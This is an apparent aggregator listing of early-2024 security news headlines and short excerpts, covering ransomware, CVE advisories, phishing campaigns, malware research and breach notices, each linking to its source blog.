Ransomware threat actors have been extorting money after taking control over organizations’ internal networks, distributing ransomware, encrypting systems, and holding system restoration for ransom. Recently, however, threat actors not only encrypts the systems but also leaks internal data and threatens to expose them publicly if the ransom is not paid. Usually, these threat actors collect data, compress them, and leak them publicly. In such processes, threat actors utilize many legitimate utility programs. These programs already allow stable transfer of large-sized... The post Data Leak Detected by AhnLab EDR (vs. Ransomware Threat Actors) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61480/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mastering SBOMs: Best practices
In our recent webinar, Mastering SBOMs: Best Practices, speakers, including Ilkka Turunen, Field CTO, Sonatype, Roger Smith, Global Testing and Digital Assurance Lead, DXC Technology, and Marc Luescher, Solution Architect, AWS, shed light on the importance of software bills of materials (SBOMs) in software development.
https://blog.sonatype.com/mastering-sboms-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Legit Security Named in the 2024 Gartner® Emerging Tech Impact Radar: Cloud-Native Platforms report
Legit Security Named a Sample Vendor for Software Supply Chain Security in the 2024 Gartner® Emerging Tech Impact Radar: Cloud-Native Platforms report.
https://www.legitsecurity.com/blog/legit-named-in-gartner-emerging-tech-impact-radar
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AppSec is harder than you think. Here's how AI can help.
In practice, shifting left has been more about shifting the burden rather than the ability. But AI is bringing its promise closer to reality. Here's how. The post AppSec is harder than you think. Here's how AI can help. appeared first on The GitHub Blog.
https://github.blog/2024-02-06-appsec-is-harder-than-you-think-heres-how-ai-can-help/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Celebrating Excellence: Alex Page Recognized As a CRN 2024 Channel Chief
Congratulations to Rapid7's Vice President of Global Channel Sales, Alex Page, who is named among the newly-announced CRN 2024 Channel Chiefs!
https://blog.rapid7.com/2024/02/06/celebrating-excellence-alex-page-recognized-as-a-crn-2024-channel-chief/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Use AI Prompting for Security Vulnerabilities
Zahra Putri Fitrianti explores the power of AI prompting for security vulnerabilities at HackerOne.
https://www.hackerone.com/ai/how-to-use-ai-prompting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Entra Verified ID introduces Face Check in preview
Face Check is now in preview in Microsoft Entra Verified ID, unlocking high-assurance verifications for enterprises securely, simply, and at scale. The post Microsoft Entra Verified ID introduces Face Check in preview appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/06/microsoft-entra-verified-id-introduces-face-check-in-preview/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Four Key Benefits of Rapid7's New Managed Digital Risk Protection Service
Cybercrime has boomed to the third largest economy in the world behind the US and China, with much of the most nefarious behavior on the dark web. Monitoring it effectively can be the key to identifying the earliest signals of an attack – and the difference between a minor event and a major breach.
https://blog.rapid7.com/2024/02/06/four-key-benefits-of-rapid7s-new-managed-digital-risk-protection-service/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Third-party breaches hit 90% of top global energy companies
A new report from SecurityScorecard reveals a startling trend among the world’s top energy companies, with 90% suffering from data breaches through third parties over the last year. This statistic is particularly concerning given the crucial function these companies serve in everyday life. Their increased dependence on digital systems facilitates the increase in attacks on […] The post Third-party breaches hit 90% of top global energy companies appeared first on Security Intelligence.
https://securityintelligence.com/articles/third-party-breaches-top-global-energy-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azure HDInsight privilege escalation and DoS vulnerabilities
Three privilege escalation and denial-of-service vulnerabilities were discovered in Azure HDinsight, related to their usage of Apache Oozie and Ambari. The root cause of at least one of these vulnerabilities is a flaw in Apache Oozie itself, leading to regex denial-of-service (ReDoS). The other two vulnerabilities could allow an authenticated attacker with HDI cluster access to gain cluster administrator privileges and perform any resource service management operation. The vulnerabilities were patched in the October 2023 security update of Azure HDinsight.
https://www.cloudvulndb.org/azure-hdinsight-dos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ivanti Connect Secure and Policy Secure Gateways Zero-day Vulnerabilities (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, CVE-2024-21893)
What is the Vulnerability? Ivanti recently published an advisory on two vulnerabilities on Jan 10, 2024 affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure Gateways (CVE-2023-46805 and CVE-2024-21887). The vulnerabilities are an authentication bypass and command injection vulnerabilities, respectively in the web component of affected application. According to the vendor advisory, when chained together, exploiting these vulnerabilities when chained together may allow attackers to run commands without the need for authentication on the compromised system. Both vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. What is the Vendor Solution? At the time of posting, there is no patch available; Ivanti has released workarounds as the two new...
https://fortiguard.fortinet.com/threat-signal-report/5371
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Improving Interoperability Between Rust and C++
Posted by Lars Bergstrom – Director, Android Platform Tools & Libraries and Chair of the Rust Foundation Board Back in 2021, we announced that Google was joining the Rust Foundation. At the time, Rust was already in wide use across Android and other Google products. Our announcement emphasized our commitment to improving the security reviews of Rust code and its interoperability with C++ code. Rust is one of the strongest tools we have to address memory safety security issues. Since that announcement, industry leaders and government agencies have echoed our sentiment. We are delighted to announce that Google has provided a grant of million to the Rust Foundation to support efforts that will improve the ability of Rust code to interoperate with existing legacy C++ codebases. We're...
http://security.googleblog.com/2024/02/improving-interoperability-between-rust-and-c.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exploited Ivanti Connect SSRF vulnerability traced back to 'xmltooling' OSS library
Over the past few weeks, vulnerabilities in proprietary Ivanti products, in particular Ivanti Connect Secure, Policy Secure, and ZTA gateways, have been making headlines for their active exploitation in the wild.
https://blog.sonatype.com/the-exploited-ivanti-connect-ssrf-vulnerability-stems-from-xmltooling-oss-library
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bots Cheat to Win
How automated fraudsters tried to ruin a restaurant&rsquo;s promotional contest.
https://www.f5.com/labs/articles/threat-intelligence/bots-cheat-to-win
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Retrospective 2024: Unit 42 Leak Site Analysis
Analysis of ransomware gang leak site data reveals significant activity over 2023. As groups formed — or dissolved — and tactics changed, we synthesize our findings. The post Ransomware Retrospective 2024: Unit 42 Leak Site Analysis appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Could your Valentine be a scammer? How to avoid getting caught in a bad romance
With Valentine's Day almost upon us, here's some timely advice on how to prevent scammers from stealing more than your heart
https://www.welivesecurity.com/en/scams/online-dating-scams-avoid-getting-caught-bad-romance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Spoutible - 207,114 breached accounts
In January 2024, Spoutible had 207k records scraped from a misconfigured API that inadvertently returned excessive personal information. The data included names, usernames, email and IP addresses, phone numbers (where provided to the platform), genders and bcrypt password hashes. The incident also exposed 2FA secrets and backup codes along with password reset tokens.
https://haveibeenpwned.com/PwnedWebsites#Spoutible
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626 AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue. Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center. Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Grandoreiro banking malware disrupted – Week in security with Tony Anscombe
The banking trojan, which targeted mostly Brazil, Mexico and Spain, blocked the victim's screen, logged keystrokes, simulated mouse and keyboard activity and displayed fake pop-up windows
https://www.welivesecurity.com/en/videos/grandoreiro-banking-malware-disrupted-week-in-security-with-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

November 2023 Cyber Attacks Statistics
November 2023 saw a rise to 39 events, with Cyber Crime remaining dominant at 78.7%. Cyber Espionage increased to 9.7%, while Hacktivism fell to 5.4%. Malware was the leading attack technique at 42.1%, and Multiple Organizations were the most targeted at 17.7%.
https://www.hackmageddon.com/2024/02/02/november-2023-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exploring the Latest Mispadu Stealer Variant
Evaluation of a new variant of Mispadu, a banking Trojan, highlights how infostealers evolve over time and can be hard to pin to past campaigns. The post Exploring the Latest Mispadu Stealer Variant appeared first on Unit 42.
https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Actors Installing Linux Backdoor Accounts
AhnLab SEcurity intelligence Center (ASEC) is using a Linux SSH honeypot to monitor attacks against unspecified Linux systems. Threat actors install malware by launching brute force and dictionary attacks against Linux systems that are poorly managed, such as using default settings or having a simple password. While there is a variety of attack cases including those where worms, CoinMiners, and DDoS bots are installed, this post will cover attack cases where backdoor accounts are created instead of malware. Such attacks... The post Threat Actors Installing Linux Backdoor Accounts appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61185/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Distribution of Qshing Emails Disguised as Payslips
AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance of the People’s Republic of China. Qshing is a compound noun from the words “QR code” and “Phishing” that leads to a malicious app being installed or directs users to a phishing site when a QR code is scanned. The email being distributed is shown in Figure 1 and is disguised as a paycheck receipt confirmation for the first quarter of 2024.... The post Distribution of Qshing Emails Disguised as Payslips appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61104/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Analysis of Phishing Case Impersonating a Famous Korean Portal Login Page
AhnLab SEcurity intelligence Center (ASEC) has recently analyzed a phishing case where a phishing page was disguised as a login page of a famous Korean portal website. ASEC has then collected some information on the threat actor. The fake login page, which is believed to have been distributed in the format of hyperlinks attached to phishing emails, was found to be very similar to the login page of the famous portal site. In fact, it is difficult to realize that... The post Analysis of Phishing Case Impersonating a Famous Korean Portal Login Page appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/61130/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Arrests in 0M SIM-Swap Tied to Heist at FTX?
Three Americans were charged this week with stealing more than 0 million in a November 2022 SIM-swapping attack. The U.S. government did not name the victim organization, but there is every indication that the money was stolen from the now-defunct cryptocurrency exchange FTX, which had just filed for bankruptcy on that same day.
https://krebsonsecurity.com/2024/02/arrests-in-400m-sim-swap-tied-to-heist-at-ftx/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

UN Cybercrime Treaty Could Endanger Web Security
Royal Hansen, Vice President of Privacy, Safety and Security EngineeringThis week, the United Nations convened member states to continue its years-long negotiations on the UN Cybercrime Treaty, titled “Countering the Use of Information and Communications Technologies for Criminal Purposes.” As more aspects of our lives intersect with the digital sphere, law enforcement around the world has increasingly turned to electronic evidence to investigate and disrupt criminal activity. Google takes the threat of cybercrime very seriously, and dedicates significant resources to combating it. When governments send Google legal orders to disclose user data in connection with their investigations, we carefully review those orders to make sure they satisfy applicable laws, international norms,...
http://security.googleblog.com/2024/02/un-cybercrime-treaty-could-endanger-web.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Connect with Microsoft at these cybersecurity events in 2024
Cybersecurity professionals, business decision makers, and developers involved in cybersecurity have many industry events to choose from. But with all the possibilities, they may be unsure of which one is right for them. Read on for recommendations based on your role. The post Connect with Microsoft at these cybersecurity events in 2024 appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/01/connect-with-microsoft-at-these-cybersecurity-events-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Atlassian Confluence Remote Code Execution (CVE-2023-22527)
What is the Vulnerability? On Jan 16 2024, Atlassian released an advisory for a template injection vulnerability on Confluence Data Center and Server. That can allow an unauthenticated attacker to remotely execute malicious code on affected versions. This vulnerability is rated with a severity level of 10.0 (Critical). What is the Vendor Solution? Atlassian highly recommend to apply the latest version available as listed on their advisory. [ Link ] What FortiGuard Coverage is available? FortiGuard Labs has an IPS signature "Atlassian.Confluence.CVE-2023-22527.Remote.Code.Execution" in place for CVE-2023-22527. The FortiGuard is seeing active exploitation attempts on this vulnerability.
https://fortiguard.fortinet.com/threat-signal-report/5376
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

3 new ways the Microsoft Intune Suite offers security, simplification, and savings
The main components of the Microsoft Intune Suite are now generally available. Read about how consolidated endpoint management adds value and functionality for security teams. The post 3 new ways the Microsoft Intune Suite offers security, simplification, and savings appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/01/3-new-ways-the-microsoft-intune-suite-offers-security-simplification-and-savings/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guide to Secure Data Backup for Linux Users
Data security in a modern business environment is considered one of the most critical factors for any company. The digitalization of the world has led to more and more data being generated daily, including very sensitive data, such as internal business plans, customer payment data, etc.
https://linuxsecurity.com/features/features/secure-data-backup-linux
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Audio-jacking: Using generative AI to distort live audio transactions
While the evolution of LLMs mark a new era of AI, we must be mindful that new technologies come with new risks. Explore one such risk called "audio-jacking." The post Audio-jacking: Using generative AI to distort live audio transactions appeared first on Security Intelligence.
https://securityintelligence.com/posts/using-generative-ai-distort-live-audio-transactions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VajraSpy: A Patchwork of espionage apps
ESET researchers discovered several Android apps carrying VajraSpy, a RAT used by the Patchwork APT group
https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scaling security with AI: from detection to solution
Dongge Liu and Oliver Chang, Google Open Source Security Team, Jan Nowakowski and Jan Keller, Machine Learning for Security TeamThe AI world moves fast, so we've been hard at work keeping security apace with recent advancements. One of our approaches, in alignment with Google's Secure AI Framework (SAIF), is using AI itself to automate and streamline routine and manual security tasks, including fixing security bugs. Last year we wrote about our experiences using LLMs to expand vulnerability testing coverage, and we're excited to share some updates. Today, we're releasing our fuzzing framework as a free, open source resource that researchers and developers can use to improve fuzzing's bug-finding abilities. We'll also show you how we're using AI to speed up the bug patching...
http://security.googleblog.com/2024/01/scaling-security-with-ai-from-detection.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Tax Season is Upon Us, and So Are the Scammers

https://www.proofpoint.com/us/newsroom/news/tax-season-upon-us-and-so-are-scammers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data security posture management vs cloud security posture management
“A data breach has just occurred”, is a phrase no security professional wants to hear. From the CISO on down to the SOC analysts, a data breach is the definition of a very bad day. It can cause serious brand damage and financial loss for enterprises, lead to abrupt career changes among security professionals, and […] The post Data security posture management vs cloud security posture management appeared first on Security Intelligence.
https://securityintelligence.com/posts/data-security-vs-cloud-security-posture-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azure Devops Zero-Click CI/CD Vulnerability
The Legit Security research team has found and reported a zero-click attack that allowed attackers to submit malicious code and access secrets. The vulnerability does not require any action from the project maintainer, making it a zero-click supply chain vulnerability.
https://www.legitsecurity.com/blog/azure-devops-zero-click-ci/cd-vulnerability
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
A network of over 130k domains was part of a campaign to deliver shareware, PUPs and other scams. We unravel the threads of this campaign from entry point to payload. The post ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign appeared first on Unit 42.
https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ESET Research Podcast: ChatGPT, the MOVEit hack, and Pandora
An AI chatbot inadvertently kindles a cybercrime boom, ransomware bandits plunder organizations without deploying ransomware, and a new botnet enslaves Android TV boxes
https://www.welivesecurity.com/en/eset-research/eset-research-podcast-chatgpt-moveit-hack-pandora/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ICS and OT threat predictions for 2024
Kaspersky experts make their predictions about ICS and OT threats: specifically, ransomware and hacktivist attacks, threats to logistics and transportation, etc.
https://securelist.com/ksb-ics-predictions-2024/111835/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fla. Man Charged in SIM-Swapping Spree is Key Suspect in Hacker Groups Oktapus, Scattered Spider
On Jan. 9, 2024, U.S. authorities arrested a 19-year-old Florida man charged with wire fraud, aggravated identity theft, and conspiring with others to use SIM-swapping to steal cryptocurrency. Sources close to the investigation tell KrebsOnSecurity the accused was a key member of a criminal hacking group blamed for a string of cyber intrusions at major U.S. technology companies during the summer of 2022.
https://krebsonsecurity.com/2024/01/fla-man-charged-in-sim-swapping-spree-is-key-suspect-in-hacker-groups-oktapus-scattered-spider/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Effortlessly upgrade to Passkeys on Pixel phones with Google Password Manager
Posted by Sherif Hanna, Group Product Manager, Pixel Security Helping Pixel owners upgrade to the easier, safer way to sign in Your phone contains a lot of your personal information, from financial data to photos. Pixel phones are designed to help protect you and your data, and make security and privacy as easy as possible. This is why the Pixel team has been especially excited about passkeys—the easier, safer alternative to passwords. Passkeys are safer because they're unique to each account, and are more resistant against online attacks such as phishing. They're easier to use because there's nothing for you to remember: when it's time to sign in, using a passkey is as simple as unlocking your device with your face or fingerprint, or your PIN/pattern/password. Google is...
http://security.googleblog.com/2024/01/upgrade-to-passkeys-on-pixel-with-google-password-manager.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mapping attacks on generative AI to business impact
In recent months, we’ve seen government and business leaders put an increased focus on securing AI models. If generative AI is the next big platform to transform the services and functions on which society as a whole depends, ensuring that technology is trusted and secure must be businesses’ top priority. While generative AI adoption is […] The post Mapping attacks on generative AI to business impact appeared first on Security Intelligence.
https://securityintelligence.com/posts/mapping-attacks-generative-ai-business-impact/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ESET takes part in global operation to disrupt the Grandoreiro banking trojan
ESET provided technical analysis, statistical information, known C&C servers and was able to get a glimpse of the victimology
https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Device Code Phishing – Add Your Own Sign-In Methods on Entra ID
TL;DR An attacker is able to register new security keys (FIDO) or other authentication methods (TOTP, Email, Phone etc.) after a successful device code phishing attack. This allows an attacker to backdoor the account (FIDO) or perform the self-service password reset for the account with the newly registered sign-in methods. Microsoft deemed this not a vulnerability.
https://blog.compass-security.com/2024/01/device-code-phishing-add-your-own-sign-in-methods-on-entra-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Join us at InfoSec Jupyterthon 2024
Jupyter notebooks are continuing to grow in popularity in information security as an alternative or supplement to mainstream security operations center (SOC) tools. Notebooks can be used interactively for threat detection and response, or as automated tasks in a larger pipeline. Their flexibility and ability to combine code, data analysis, and visualization in a single, […] The post Join us at InfoSec Jupyterthon 2024 appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/01/29/join-us-at-infosec-jupyterthon-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Best practices in moving to cloud native endpoint management
This blog is the second of three that details our recommendation to adopt cloud native device management. Understand the lessons from various Intune customers in their journeys and how they achieved greater security, cost savings, and readiness for the future through their cloud transformations. The post Best practices in moving to cloud native endpoint management appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/microsoft-365/blog/2024/01/29/best-practices-in-moving-to-cloud-native-endpoint-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ermac malware: The other side of the code
When the Cerberus code was leaked in late 2020, IBM Trusteer researchers projected that a new Cerberus mutation was just a matter of time. Multiple actors used the leaked Cerberus code but without significant changes to the malware. However, the MalwareHunterTeam discovered a new variant of Cerberus — known as Ermac (also known as Hook) […] The post Ermac malware: The other side of the code appeared first on Security Intelligence.
https://securityintelligence.com/posts/ermac-malware-the-other-side-of-the-code/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mitigate Enterprise Software Supply Chain Security Risks - Insights Into the Gartner® Report
Gain insights into the Gartner® report and learn how to mitigate enterprise software supply chain risks by integrating software supply chain security into vendor risk management.
https://www.legitsecurity.com/blog/mitigate-enterprise-software-supply-chain-security-risks-insights-into-the-gartner-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber: The Swiss army knife of tradecraft
In today's digitally interconnected world, advanced cyber capabilities have become an exceptionally potent and versatile tool of tradecraft for nation-states and criminals alike
https://www.welivesecurity.com/en/cybersecurity/cyber-swiss-army-knife-tradecraft/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-30 November 2023 Cyber Attacks Timeline
In the latter half of November 2023, I collected 207 cybersecurity events, with ransomware dominating at 34.78%. Financial technology sector hacks led to 7 million in crypto losses, along with significant data breaches and cyber espionage by groups from Palestine, North Korea, China, and Russia.
https://www.hackmageddon.com/2024/01/29/16-30-november-2023-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MyPertamina - 5,970,416 breached accounts
In November 2022, the Indonesian oil and gas company Pertamina suffered a data breach of their MyPertamina service. The incident exposed 44M records with 6M unique email addresses along with names, dates of birth, genders, physical addresses and purchases.
https://haveibeenpwned.com/PwnedWebsites#MyPertamina
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DevSecOps maturity model: A beginner's guide
In recent years, DevSecOps swiftly emerged as a crucial new paradigm in software development, prioritizing the integration of security into DevOps practices.
https://blog.sonatype.com/devsecops-maturity-model-a-beginners-guide
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Who is Alleged Medibank Hacker Aleksandr Ermakov?
Authorities in Australia, the United Kingdom and the United States this week levied financial sanctions against a Russian man accused of stealing data on nearly 10 million customers of the Australian health insurance giant Medibank. 33-year-old Aleksandr Ermakov allegedly stole and leaked the Medibank data while working with one of Russia's most destructive ransomware groups, but little more is shared about the accused. Here's a closer look at the activities of Mr. Ermakov's alleged hacker handles.
https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DORA and your quantum-safe cryptography migration
Quantum computing is a new paradigm with the potential to tackle problems that classical computers cannot solve today. Unfortunately, this also introduces threats to the digital economy and particularly the financial sector. The Digital Operational Resilience Act (DORA) is a regulatory framework that introduces uniform requirements across the European Union (EU) to achieve a “high […] The post DORA and your quantum-safe cryptography migration appeared first on Security Intelligence.
https://securityintelligence.com/posts/dora-quantum-safe-cryptography-migration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Blackwood hijacks software updates to deploy NSPX30 – Week in security with Tony Anscombe
The previously unknown threat actor used the implant to target Chinese and Japanese companies, as well as individuals in China, Japan, and the UK
https://www.welivesecurity.com/en/videos/blackwood-software-updates-nspx30-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Midnight Blizzard: Guidance for responders on nation-state attack
The Microsoft security team detected a nation-state attack on our corporate systems on January 12, 2024, and immediately activated our response process to investigate, disrupt malicious activity, mitigate the attack, and deny the threat actor further access. The Microsoft Threat Intelligence investigation identified the threat actor as Midnight Blizzard, the Russian state-sponsored actor also known as NOBELIUM. The post Midnight Blizzard: Guidance for responders on nation-state attack appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Using Google Search to Find Software Can Be Risky
Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.
https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

npm flooded with 748 packages that store movies
Meet npmjs.com, a video and eBook hosting platform — not our words, but it seems that's what goes in the mind of some users (and attackers) recently seen misusing the platform to store media like multi-gig movies, videos, and eBooks.
https://blog.sonatype.com/npm-flooded-with-748-packages-that-store-movies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Recap: Elite Pentesters Tell All in a Live Q&A
Three elite HackerOne pentesters recently shared their stories in a live AMA session that looked at the impact and results of community-driven pentesting.
https://www.hackerone.com/penetration-testing/pentester-ama-recap
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Updated SBOM guidance: A new era for software transparency?
The cost of cyberattacks on software supply chains is a growing problem, with the average data breach costing .45 million in 2023. Since President Biden’s 2021 executive order, software bills of materials (SBOMs) have become a cornerstone in protecting supply chains. In December 2023, the National Security Agency (NSA) published new guidance to help organizations […] The post Updated SBOM guidance: A new era for software transparency? appeared first on Security Intelligence.
https://securityintelligence.com/articles/updated-sbom-guidance-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Investigating Worldwide SMS Scams, and Tens of Millions of Dollars in Fraud
SMS services remain a critical part of telecommunications; they don't require Internet access, and companies use them to inform their customers. This combination of features makes them incredibly useful for criminals who use the technology as a stepping stone in their never-ending campaigns. And if you think that the new RCS messaging standard [https://en.wikipedia.org/wiki/Rich_Communication_Services] will offer any protection, you would be wrong. These types of scams will continue to spread re
https://www.bitdefender.com/blog/labs/investigating-worldwide-sms-scams-and-tens-of-millions-of-dollars-in-fraud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Year, New Initiatives for the NIST Privacy Framework!
It's been four years since the release of The NIST Privacy Framework: A Tool for Improving Privacy Through Enterprise Risk Management, Version 1.0. Since then, many organizations have found it highly valuable for building or improving their privacy programs. We've also been able to add a variety of resources to support its implementation. We're proud of how much has been accomplished in just a few short years, but we're not resting on our laurels. As another, more famous, Dylan once said, “the times they are a-changin'.” For example, the past year has seen the release of the NIST AI Risk
https://www.nist.gov/blogs/cybersecurity-insights/new-year-new-initiatives-nist-privacy-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Privacy predictions for 2024
Kaspersky experts review their privacy predictions for 2023 and last year's trends, and try to predict what privacy concerns and solutions are to come in 2024.
https://securelist.com/ksb-privacy-predictions-2024/111815/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate.You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags:clamav/clamav:unstableclamav/clamav:unstable_base clamav/clamav-debian:unstableclamav/clamav-debian:unstable_base This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake 'distube-config' npm package drops Windows info-stealing malware
Sonatype has identified two npm packages distube-config and discordyt that typosquat open source packages like Discord modules, in an attempt to infect Windows users with a Trojan. Our security researcher, Juan Aguirre, who analyzed the malware shares some insights.
https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sensor Intel Series: Top CVEs in December 2023
We add 6 CVEs to our list and do a brief roundup of some stats from 2023.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-december-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Privacy Attacks in Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or the CDEI blog . Our first post in the series introduced the concept of federated learning—an approach for training AI models on distributed data by sharing model updates instead of training data. At first glance, federated learning seems to be a perfect fit for privacy since it completely avoids sharing data
https://www.nist.gov/blogs/cybersecurity-insights/privacy-attacks-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SLSA Provenance Blog Series, Part 4: Implementation Challenges for SLSA Provenance for Enterprises
In previous parts of the series, we dived into the concept of SLSA Provenance and the in-toto framework that empowers it.Next, we learned about the challenges of adopting SLSA provenance as an enterprise.In this post, we finally discuss the solution and the challenges and learn how you can use SLSA Provenance to secure your enterprise pipelines.
https://www.legitsecurity.com/blog/slsa-provenance-blog-series-part-4-implementation-challenges
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Managed Security Services Provider (MSSP) Market News: 23 January 2024

https://www.proofpoint.com/us/newsroom/news/managed-security-services-provider-mssp-market-news-23-january-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Assessment: BianLian
We analyze the extremely active ransomware group BianLian. Mostly targeting healthcare, they have moved from double-extortion to extortion without encryption. The post Threat Assessment: BianLian appeared first on Unit 42.
https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trello - 15,111,945 breached accounts
In January 2024, data was scraped from Trello and posted for sale on a popular hacking forum. Containing over 15M email addresses, names and usernames, the data was obtained by enumerating a publicly accessible resource using email addresses from previous breach corpuses. Trello advised that no unauthorised access had occurred.
